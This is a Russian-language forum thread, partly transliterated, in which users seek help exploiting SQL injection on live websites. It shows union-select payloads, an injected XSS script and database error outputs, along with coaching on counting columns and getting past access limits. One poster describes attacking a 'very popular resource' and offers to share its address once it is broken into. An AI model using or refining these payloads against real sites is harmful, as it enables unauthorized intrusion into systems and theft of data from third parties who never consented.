SQL Injection Help
 

Zdarova
nu mne intiresna ia sastavlaiu SQL zapros
nu sperva test
1.http://site.ze/cat.php?c=-1'A
Atvet :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'A ORDER BY `ID` DESC LIMIT 1' at line 1
___________________________________ ____________
2.http://site.ze/cat.php?c=-1+union+se...ase(),null,7,8 ,9+from+mysql.user+where+id=1/*
Atvet:Cannot query the database.
Access denied for user 'top'@'localhost' to database 'mysql'
___________________________________ ___________
3.http://site.ze/cat.php?c=-1+union+select+1,2,<script>alert(); </script>,null,5,null,7,8,9+from+mysq l.user+where+id=1/*
Rabotait
___________________________________ ______________
4.http://site.ze/cat.php?c=-1+union+se...,7,8%20%20,9/*
ATVET:Cannot query the database.
The used SELECT statements have a different number of columns
___________________________________ ______________________
Shto mne shas delat
?
Prashu abisnite

вообще при наличии ORDER BY `ID` DESC LIMIT 1' at line 1 у тебя не должно ничего работать вообще =)

Ордер бай идет после места инъекции.

не заметил..
насчет 2го - часто к mysql имеет доступ либо root либо какой-ниб привелигированный юзер.. поэтому ищи поля бд которая доступна именно тебе
насчет 4го - напиши полностью 4ый запрос в тэгах код, но вообще в ошибке и так сказанно что не то число столбцов

Мне вот это странно, что 3 работает, т.к. там нету ковычек, это что получается такая колонка есть.

А в 4 ясно написано что кол-во колонок не совпадает.

karoche nechivo ne vixodit da :(

давай пример. чем сможем тем поможем =))
стихи прямо..

Есть похожая тема. Нашел инекцию в очень раскрученном ресурсе. Параметр передается походу двум запросам, один на 5 столбцов, другой на 8. И не понятно, почему точка с запятой приводят к ошибке в любом месте, и после параметра и в Union запросе. Вот примеры.

1. =0;/*
Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';/*' at line 1Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';/*' at line 1

2. =0 union select null, null, null, null, null/*

Query Error!
The used SELECT statements have a different number of columns

3. =0 union select null, null, null, null, VERSION()/*
Query Error!
The used SELECT statements have a different number of columns

Если сломаю, с меня адресок ресурса :)

всю жизнь мечтали )))

посмотри сколько точно столбцов участвует в запросе, при помощи order by

В смысле, сколько участвует? На странице должно выводится два запроса с этим параметром, т.е. в одном из них должно быть 5 столбцов, ниже на стр второй с этим же параметром, но 8 столбцов. Возможно это даже разные таблицы. Дело в том, что при выборе например 4 столбцов выводятся два сообщения об ошибке и неправильном количестве столбцов, при выборе 5 или 8 только одно. Соответсвенно, в любом случае при запросе я получаю ошибку или от одного или от другого. Можно ли это исправить?